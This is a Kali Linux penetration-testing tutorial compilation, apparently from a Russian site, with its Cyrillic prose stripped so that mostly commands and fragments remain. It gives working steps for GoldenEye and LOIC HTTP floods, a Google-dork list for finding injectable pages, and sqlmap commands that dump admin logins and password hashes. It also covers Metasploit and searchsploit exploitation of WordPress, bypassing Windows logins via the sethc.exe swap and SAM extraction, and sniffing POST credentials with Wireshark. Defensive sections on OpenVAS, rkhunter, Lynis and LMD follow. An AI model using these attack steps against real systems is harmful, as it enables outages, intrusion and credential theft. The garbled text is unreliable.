IP :
root@kali:~/GoldenEye/GoldenEye-master# ./goldeneye.py http://www.goldeneyetestsite.com/ -w 10 -s 10 -m random
:
-w = 10
-s = 10
-m = , GET POST
DoS!
Google Analytics GoldenEye
, , -
. , Google Analytics
( IP,
Google , ).
:
Google, . .
.
Google , -
Google.
.
/ GoldenEye
, Apache:
1. IP ( 300 IP Apache)
2. IP
3. KeepAlive Connection Timeout ( 300)
4. , .
, .
5. Web application Firewall (WAF).
6.
.
7. NGINX Node.js .
GoldenEye ( ) HTTP Flooder .
, NoCache KeepAlive GoldenEye .
,
, .
, -
( ), - -
, GET POST .
. WAF .
. . .
, , Kali Linux, .
Ubuntu, Linux Mint ( Debian), :
sudo apt-get install mono-complete
, ,
cd ./Desktop
loic, :
mkdir loic
,
cd ./loic
:
wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh
:
chmod 777 loic.sh
:
./loic.sh install
- ,
loic. , :
./loic.sh update
, LOIC. :
./loic.sh run
, , Windows ( )?
Linux !
- Low Orbit Ion Cannon (LOIC)
LOIC . IRC .
. URL IP .
. Lock on. : TCP, UDP HTTP. HTTP.
. , IMMA
CHARGIN MAH LAZER. LOIC . Stop Flooding
:
.. , Windows
Linux. , IRC ,
.
.
5. -
Windows, "
sqlmap Windows". ,
" : SQL-".
, , Kali Linux,
, ? ,
- . , , ,
. ()
,
-. ,
PHP, , !
-
.
SQLMAP,
SQL-.
, , , ,
.
SQL- , ,
, ( ) SQL
(, ).
SQL- , ,
,
SQL ,
. SQL-
-, SQL .
SQLMAP SQL-
Kali Linux , , - ( , )
Kali Linux.
: Kali Linux,
Kali Linux:
.
, WebWare.biz Kali Linux.
SQLMAP
sqlmap ,
SQL-
. ,
,
.
MySQL, Oracle, PostgreSQL,
Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase SAP MaxDB.
SQL-: ,
, , UNION ,
.
SQL-
, IP , .
, , , , ,
.
.
, , ,
.
.
,
. , ,
, ,
name pass ( ).
()
, MySQL, PostgreSQL
Microsoft SQL Server.
, ,
MySQL, PostgreSQL Microsoft SQL Server.
(out-of-band) TCP
.
, Meterpreter
(VNC) .
Metasploit
Meterpreter.
, ,
- , , .
- , . ,
.
, :
1: -
, , , .
, Google Dorks , . ,
, , .
- , , .
1.: Google Dorks SQLMAP SQL -
. .
, .
, .
Google Dork string (column 1)    Google Dork string (column 2)   Google Dork string (column 3)
inurl:item_id=                   inurl:review.php?id=            inurl:hosting_info.php?id=
inurl:newsid=                    inurl:iniziativa.php?in=        inurl:gallery.php?id=
inurl:trainers.php?id=           inurl:curriculum.php?id=        inurl:rub.php?idr=
inurl:news-full.php?id=          inurl:labels.php?id=            inurl:view_faq.php?id=
inurl:news_display.php?getid=    inurl:story.php?id=             inurl:artikelinfo.php?id=
inurl:index2.php?option=         inurl:look.php?ID=              inurl:detail.php?ID=
inurl:readnews.php?id=           inurl:newsone.php?id=           inurl:index.php?=
inurl:top10.php?cat=             inurl:aboutbook.php?id=         inurl:profile_view.php?id=
inurl:newsone.php?id=            inurl:material.php?id=          inurl:category.php?id=
inurl:galeri_info.php?l=         inurl:website.php?id=
1.: , - SQLMAP
SQL-
, , .
, SQLMAP SQL-.
, , ,
.
, inurl:rubrika.php?idr=, -
:
http://www.sqldummywebsite.name/rubrika.php?id=28
' URL. ( "
, ' ).
:
http://www.sqldummywebsite.name/rubrika.php?id=28'
SQL , SQLMAP SQL-.
,
.
.
SQLi
Microsoft SQL Server
Server Error in / Application. Unclosed quotation mark before the character string attack;
Description: An unhanded exception occurred during the execution of the current web request. Plea
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the chara
MySQL
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/ww
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL se
Oracle
java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.D
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated
PostgreSQL Errors
Query failed: ERROR: unterminated quoted string at or near
2: SQLMAP SQL-
, -
SQLMAP SQL-.
( ). SQLMAP,
, .
-.
sqlmap -u http://www.sqldummywebsite.name/rubrika.php?id=31 --dbs
:
sqlmap = sqlmap
-u = (. http://www.sqldummywebsite.name/rubrika.php?id=31)
dbs =
:
web server operating system: Linux Gentoo
web application technology: Nginx, PHP 5.3.29
back-end DBMS: MySQL 5.0.11
[18:47:01] [INFO] resumed: information_schema
[18:47:01] [INFO] resumed: laminat
, , ,
information_schema MYSQL.
, laminat.
3. , SQLMAP SQL-
- .
:
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat --tables
, 18 .
[18:52:25] [INFO] fetching tables for database: 'laminat'
[18:52:25] [INFO] fetching number of tables for database 'laminat'
! , . ,
:
heslo
stupen
login .
.. .
5: SQLMAP SQL-
SQLMAP SQL- ! :
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin --dump
. , , ,
, , :
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin -C login --dump
.
, .
.
6: SQLMAP SQL-
, . , .
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin -C heslo --dump
!! .
, . - . -,
- .
. . ,
.
, - , sqlmap .
. -,
.
, ,
-.
.. , - ,
. , , , , ,
, , ,
, , !
, . WebWare.biz
, ,
. . , WebWare.biz, ,
: ,
. , :
, -
.
(
, ). ,
.
Kali Linux, , ,
Kali Linux ( , ).
WordPress .
. WordPress
, ,
(!). WordPress
.
WordPress Security Scanner
WordPress. :
;
;
;
robots.txt;
WordPress, , .
, . ( ):
wpscan --update
( ), .
WordPress Security Scanner
update : .
url -u < url> : URL / WordPress .
force -f : WPScan , WordPress
( , WordPress, ).
enumerate -e [()] : (
).
:
u : id 1 10
u[10-20] : id 10 20 ( [] )
p :
vp : , ,
ap : ( )
tt : timthumbs
t :
vt : , ,
at : ( ).
, -e p,vt
. ,
"vt,tt,u,vp".
, , .
:
wpscan -h
:
wpscan -u webware.biz -e p,vt
.. wpscan, -u -
. -e ( ).
,
( ).
, WordPress,
, :
WordPress .
:
/proxy/admin.php, Glype;
, . . ,
wp-content/plugins/wordpress-backup-to-dropbox/. ,
, ,
. , VPS ( ,
).
Plecost
WordPress .
, ( , ).
,
, . ,
. . , .
-i, .
, . Kali Linux
//usr/share/plecost/wp_plugin_list.txt ( ).
plecost -i
//usr/share/plecost/wp_plugin_list.txt, . :
plecost -i //usr/share/plecost/wp_plugin_list.txt webware.biz
( ):
, , Metasploit Framework
searchsploit, The Exploit Database .
: WPScan Vulnerability Database ( WordPress)
Packet Storm ( ).
( WordPress)
1. WordPress (
-).
2. , ,
WordPress, (
-) , , . ..
- , , .
3. WordPress:
,
. .
WordPress. ,
, , "" . : )
, ; ) .
4. ( 30
, ). -
( ).
, .
5. ! Kali Linux ! ,
. , Kali Linux,
Linux. , .
,
, ,
. ..
, - , , ,
. , ( )
,
. , ,
, . ..,
, (
), ""
, , .
W3af (Web Application Attack and Audit Framework) open-source -
.
, - .
, .
-
XSS, CSRF Sqli w3af .
W3af
W3af :
w3af_console
:
w3af>>> help
:
|-----------------------------------------------------------------------------|
| start | . |
| plugins | . |
| exploit | . |
| profiles | . |
| cleanup | . |
|-----------------------------------------------------------------------------|
| help | . : help [] , |
| | "" |
| version | w3af. |
| keys | . |
|-----------------------------------------------------------------------------|
| http-settings | HTTP . |
| misc-settings | w3af. |
| target | URL. |
|-----------------------------------------------------------------------------|
| back | Go to the previous menu. |
| exit | Exit w3af. |
|-----------------------------------------------------------------------------|
| kb | , . |
|-----------------------------------------------------------------------------|
w3af .
,
"back".
"view"
.
"target". URL .
:
w3af>>> target
w3af/config:target>>> help
:
|-----------------------------------------------------------------------------|
| view | . |
| set | . |
| save | . |
|-----------------------------------------------------------------------------|
| back | Go to the previous menu. |
| exit | Exit w3af. |
|-----------------------------------------------------------------------------|
URL :
w3af/config:target>>> set target http://localhost
w3af/config:target>>> view
.
w3af/config:target>>> back
w3af>>> plugins
w3af/plugins>>> help
|---------------------------------------------------------------------------------------------------|
| list | List available plugins. |
|---------------------------------------------------------------------------------------------------|
| back | Go to the previous menu. |
| exit | Exit w3af. |
|---------------------------------------------------------------------------------------------------|
| grep | View, configure and enable grep plugins |
| audit | View, configure and enable audit plugins |
| evasion | View, configure and enable evasion plugins |
| crawl | View, configure and enable crawl plugins |
| auth | View, configure and enable auth plugins |
| mangle | View, configure and enable mangle plugins |
| output | View, configure and enable output plugins |
| bruteforce | View, configure and enable bruteforce plugins |
| infrastructure | View, configure and enable infrastructure plugins |
|---------------------------------------------------------------------------------------------------|
-
. Audit,crawl, infrastructure output.
audit, ,
xss, csrf, sql ldap ..
.
:
w3af/plugins>>> audit xss,csrf,sqli
:
w3af/plugins>>> audit all
- .
html.
crawl output.
w3af/plugins>>> crawl web_spider,pykto
w3af/plugins>>> infrastructure hmap
w3af/plugins>>> output console,html_file
:
Web_spider web-.
.
Pykto nikto, python.
nikto (scan_database) .
Hmap -, ,
.
"Server".
hmap Dustin Lee.
Console .
Html_file HTML-.
:
w3af/plugins>>> back
w3af>>> start
, .
:
w3af>>> start
Auto-enabling plugin: discovery.allowedMethods
Auto-enabling plugin: discovery.error404page
Auto-enabling plugin: discovery.serverHeader
The Server header for this HTTP server is: Apache/2.2.3 (Ubuntu) PHP/5.2.1
Hmap plugin is starting. Fingerprinting may take a while.
The most accurate fingerprint for this HTTP server is: Apache/2.0.55 (Ubuntu) PHP/5.1.2
pykto plugin is using "Apache/2.0.55 (Ubuntu) PHP/5.1.2" as the remote server type. This informa
pykto plugin found a vulnerability at URL: http://localhost/icons/ . Vulnerability description: Dire
the /icons directory should be removed. The vulnerability was found in the request with id 128.
pykto plugin found a vulnerability at URL: http://localhost/doc/ . Vulnerability description: The /d
pykto plugin found a vulnerability at URL: http://localhost/\> . Vulnerability description: The IBM
was found in the request with id 3385.
New URL found by discovery: http://localhost/
New URL found by discovery: http://localhost/test2.html
New URL found by discovery: http://localhost/xst2.html
New URL found by discovery: http://localhost/xst.html
New URL found by discovery: http://localhost/test.html
, results.html:
5 :
-c .
-v , .
, .
searchsploit ( ), :
searchsploit phpmyadmin
searchsploit wordpress
, . ( ),
, . .
: : .c, .pl, .txt, .sh,
.php, .rb, .py, .zip, .java, .asm, .htm .
.txt
. , , : ,
, , . .
.rb Ruby, :
ruby + + .
:
ruby /usr/share/exploitdb/platforms/php/webapps/28126.rb
.rb Metasploit.
-,
require 'msf/core'
Metasploit
.c .
.php . Ruby
, PHP
( ,
).
,
php /usr/share/exploitdb/platforms/php/webapps/35413.php webware.biz Alexey 50
- ,
. :
msf > db_rebuild_cache
search + + . :
msf > search wordpress
, , .
: ,
, ( ),
.
, WordPress , . .
.
, , :
exploit/unix/webapp/wp_downloadmanager_upload 2014-12-03 excellent WordPress Download Manager (download-manager) Unauthenticated File Upload
exploit/unix/webapp/wp_downloadmanager_upload
use .
msf > use exploit/unix/webapp/wp_downloadmanager_upload
, :
show options
( ).
, .
set
:
set RHOST webware.biz
.
TARGETURI. , , phpMyAdmin,
phpmyadmin ,
.
exploit
, .
, , ,
, . . nmap.
:
msf > nmap 10.0.2.2
, , , ,
.
" Kali Linux 1.0.9a. 2.
".
, :
- (phpMyAdmin, WordPress, Drupal . .)
.
. , -.
, .
- , : )
, , ; )
, ,
.
6.
OpenVAS 8.0
.
.
Kali Linux OpenVAS 8.0
Kali Linux.
, ,
OpenVAS 8.0 .
Kali
, , Kali
OpenVAS. , openvas-setup OpenVAS,
, admin .
,
.
root@kali:~# apt-get update
root@kali:~# apt-get dist-upgrade

root@kali:~# apt-get install openvas
root@kali:~# openvas-setup
/var/lib/openvas/private/CA created
/var/lib/openvas/CA created

[i] This script synchronizes an NVT collection with the 'OpenVAS NVT Feed'.
[i] Online information about this feed: 'http://www.openvas.org/openvas-nvt-feed
...
sent 1143 bytes received 681741238 bytes 1736923.26 bytes/sec
total size is 681654050 speedup is 1.00
[i] Initializing scap database
[i] Updating CPEs
[i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2002.xml
[i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2003.xml
...
- OpenVAS
https://127.0.0.1:9392,
SSL admin.
. (
, ),
. :
openvasmd --get-users
:
openvasmd --user=admin --new-password=1
, admin, , ,
. , , .
openvasmd --create-user=mial
.
openvas-start
! OpenVAS IP ,
. !
(rootkit) ,
, .
, ,
, , -
.
Linux ,
.
Rootkit Hunter (rkhunter). , Linux
rkhunter.
rkhunter Linux
rkhunter Debian, Ubuntu Linux Mint:
$ sudo apt-get install rkhunter
rkhunter Fedora:
$ sudo yum install rkhunter
rkhunter CentOS RHEL Repoforge
, yum.
$ sudo yum install rkhunter
Linux
.
$ sudo rkhunter -c
rkhunter , , :
SHA-1
, .
, .
, , -
.
,
xinetd.
.
.
.
.
.
Rootkit Hunter .
, rkhunter /var/log/rkhunter.log.
.
$ sudo grep Warning /var/log/rkhunter.log
Linux
Linux 6 ? .
Shellshock, Heartbleed, Poodle, Ghost , , . -
Linux,
. ? openVPN ?
SSH ? Linux.
, , ,
. Lynis. Lynis
.
, .
Lynis.
Linux?
Lynis
.
.
. Lynis
,
. ,
.
Lynis:
1.
2.
3.
Lynis (, yum apt-get),
, Lynis.
.
Lynis
, Lynis
.
. , ,
, .
Lynis,
.
Red Hat: $ sudo yum install lynis
Debian: $ sudo apt-get install lynis
, , . !
?
Lynis
, .
( /usr/local/lynis)
Lynis ( ).
mial@mial-VirtualBox ~ $ sudo -s
[sudo] password for mial:
mial-VirtualBox ~ # mkdir /usr/local/lynis
mial-VirtualBox ~ # cd /usr/local/lynis/
mial-VirtualBox lynis #
Lynis
() Lynis ( lynis-
1.6.4.tar.gz). wget ( ).
Mac OS curl, BSD
fetch.
mial-VirtualBox lynis # wget https://cisofy.com/files/lynis-1.6.4.tar.gz
Lynis
Lynis ,
.
mial-VirtualBox lynis # ./lynis --help

[ Lynis 1.6.4 ]

###############################################################################
Lynis comes with ABSOLUTELY NO WARRANTY. This is free software, and you are
welcome to redistribute it under the terms of the GNU General Public License.
See the LICENSE file for details about using this software.

Copyright 2007-2014 - CISOfy & Michael Boelen, http://cisofy.com
Enterprise support and plugins available via CISOfy - http://cisofy.com
###############################################################################

[+] Initializing program
------------------------------------
Scan options:
--auditor "<name>" : Auditor name
--check-all (-c) : Check system
--no-log : Don't create a log file
--pentest : Non-privileged scan (useful for pentest)
--profile <profile> : Scan the system with the given profile file
--quick (-Q) : Quick mode, don't wait for user input
--tests "<tests>" : Run only tests defined by <tests>
--tests-category "<category>" : Run only tests defined by <category>

Layout options:
--no-colors : Don't use colors in output
--quiet (-q) : No output, except warnings
--reverse-colors : Optimize color display for light backgrounds

Misc options:
--check-update : Check for updates
--debug : Debug logging to screen
--view-manpage (--man) : View man page
--version (-V) : Display version number and quit

Enterprise options:
--plugin-dir "<path>" : Define path of available plugins
--upload : Upload data to central node

See man page and documentation for all available options.
Lynis
Linux Mint Lynis.
./lynis --auditor "MiAl" -c -Q
- PHP:
[+] Software: PHP
Checking PHP [ NOT FOUND ]
Checking PHP disabled functions [ NONE ]
include/tests_php php.ini.
:
mial-VirtualBox lynis # ./lynis -c
()
mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -Q
()
mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -Q -q
()
mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -q -Q --pentest
( )
Lynis
Lynis /var/log/lynis.log. Lynis
Shellshock . , ,
.
- . .
Lynis .
/var/log/lynis.log .
, Lynis ( ):
, Lynis .
.
GPLv3 .
.
, .
-
.
, :
HTML ( ).
.
CVE HTML .
.
SQLi .
/.
, config/include .
, ,
. , Lynis .
, Linux, Windows Unix .
,
. Lynis ,
, ( )
.
.
: Lynis
: http://cisofy.com/lynis/
:
: GPLv3
http://cisofy.com/downloads/
, , ,
, .
, , Linux, ,
RHEL, CentOS, Fedora, Debian, Ubuntu, Mint.
, Apache
DOS , mod_security mod_evasive.
LMD (Linux Malware Detect).
Malware?
Malware () , ,
. (malware)
, , , ,
,
.
Linux Malware Detect (LMD)?
Linux Malware Detect (LMD) ,
Unix/Linux ,
GNU GPLv2. ,
. , , ,
, , ,
// .
./install.sh
sudo ./install.sh
, -.
:
3: LMD
,
, , . ,
- , .
email_alert : , 1.
email_subj : .
email_addr :
.
quar_hits : , 1.
quar_clean : , 1.
quar_susp : ,
, .
quar_susp_minuid : userid .
/usr/local/maldetect/conf.maldet .
vi /usr/local/maldetect/conf.maldet
.
# [ EMAIL ALERTS ]
##
# The default email alert toggle
# [0 = disabled, 1 = enabled]
email_alert=1

# The subject line for email alerts
email_subj=" $(hostname)"

# The destination addresses for email alerts
# [ values are comma (,) spaced ]
email_addr="alexey@webware.biz"

# Ignore e-mail alerts for reports in which all hits have been cleaned.
# This is ideal on very busy servers where cleaned hits can drown out
# other more actionable reports.
email_ignore_clean=0

##
# [ QUARANTINE OPTIONS ]
##
# The default quarantine action for malware hits
# [0 = alert only, 1 = move to quarantine & alert]
quar_hits=1

# Try to clean string based malware injections
# [NOTE: quar_hits=1 required]
# [0 = disabled, 1 = clean]
quar_clean=1

# The default suspend action for users wih hits
# Cpanel suspend or set shell /bin/false on non-Cpanel
# [NOTE: quar_hits=1 required]
# [0 = disabled, 1 = suspend account]
quar_susp=0
# minimum userid that can be suspended
quar_susp_minuid=500
4:
,
.
maldet --scan-all /home
, ,
, ,
.
# maldet --quarantine SCANID

# maldet --clean SCANID
5:
LMD /etc/cron.daily/maldet,
, , . .
. ,
.
vi /etc/cron.daily/maldet
, ,
.
Windows?
Windows ( ),
, , .
Windows
.
ElcomSoft System Recovery,
( ,
, ,
- 1, 1111, 123, admin, password, ).
Kali Linux.
, Kali Linux 1) Windows, 2)
,
.
, . 99.99%
, - .
, Live- ( Linux
). C:\Windows\System32\ cmd.exe sethc.exe
osk.exe. , sethc.exe ( osk.exe), cmd.exe
.
sethc.exe, Windows,
, SHIFT, osk.exe,
. (cmd.exe)
:
net user _ *
.. admin, :
net user admin *
.
.
Active Directory is ,
LDAP. SAM
C:\<systemroot>\System32\config\ (C:\<systemroot>\sys32\config\).
SAM , LM NTLM,
.
: .
,
SAM Windows . SAM
( ),
- . SAM
C:\. Linux, Kali,
Live-.
SAM C:\<systemroot>\repair.
SAM .
, , , ,
. expand. Expand
[FILE] [DESTINATION]. SAM
uncompressedSAM.
C:\> expand SAM uncompressedSAM
, Microsoft Windows 2000
SYSKEY. SYSKEY
SAM 128- ,
Windows.
Windows SYSKEY (
) :
1. (, Kali).
2. SAM SYSTEM
(C:\<systemroot>\System32\config\ (C:\<systemroot>\sys32\config\)).
3. SYSTEM bkreg bkhive.
4. .
5. , John the Ripper.
. Windows
MAC(, ), .
,
( ) .
Windows
Windows- SAM SYSKEY.
Windows ,
, Microsoft Windows
.
fdisk -l .
Windows . fdisk NTFS ,
:
Device Boot Start End Blocks Id System
/dev/hdb1* 1 2432 19535008+ 86 NTFS
/dev/hdb2 2433 2554 979965 82 Linux swap/Solaris
/dev/hdb3 2555 6202 29302560 83 Linux
mkdir /mnt/windows.
Windows
:
mount -t <WindowsType> <Windows partition> /mnt/windows
, Windows , SAM
SYSTEM :
cp SAM SYSTEM /pentest/passwords/AttackDirectory
SAM. PwDump and Cain, Abel samdump
.
, SAM.
SAM. ,
SAM .
bkreg bkhive are ,
, :
Windows:
-, .
-. ,
. ( BIOS
,
).
,
VeraCrypt TrueCrypt (
, ).
Windows ,
, , (
) . . .
7. .
- WireShark ( )
, , -
ENTER, . , .
-?? (, ) -
HTTP (PlainText),
( ) . ,
- -, HTTP
. ,
(BGP ,
).
, , ,
HTTP. ,
, , ,
.
, -.
. VirtualBox/VMWare/ .
: ,
.
1. Wireshark
Kali Linux Wireshark
> Kali Linux > Top 10 Security Tools > Wireshark
Wireshark Capture > Interface
, , eth0,
wlan0.
, Start Wireshark .
, Capture > Start
2. POST
, Wireshark .
-, .
, Wireshark. ,
. , ,
,
.
Wireshark . ,
POST.
POST?
,
POST.
POST,
:
http.request.method == "POST"
. 1 POST.
3: POST
Follow TCP Steam
, - :
log=Dimon&pwd=justfortest?
..
log=Dimon ( : Dimon)
pwd=justfortest (: justfortest)
, WebWare.biz .
WireShark
1. . ,
Wi-Fi , .
2. , , ,
. ( ),
, , .
, .
.
, ,
, .
3. VPN,
.
4. SSL-. :
. : , , ,
- SSL-, , .
: ( , , , -
, - . .) . !
, SSL-.
( , /
/ ), SSL-
( , ). ,
, , 400 .
, SSL-.
- ,
SSL-, .
, , .
( WebWare.biz),
- ,
: http://webware.biz/?page_id=27
http://webware.biz/
http://webware.biz/?feed=rss2 https://vk.com/webware_biz
http://webware.biz/?p=3920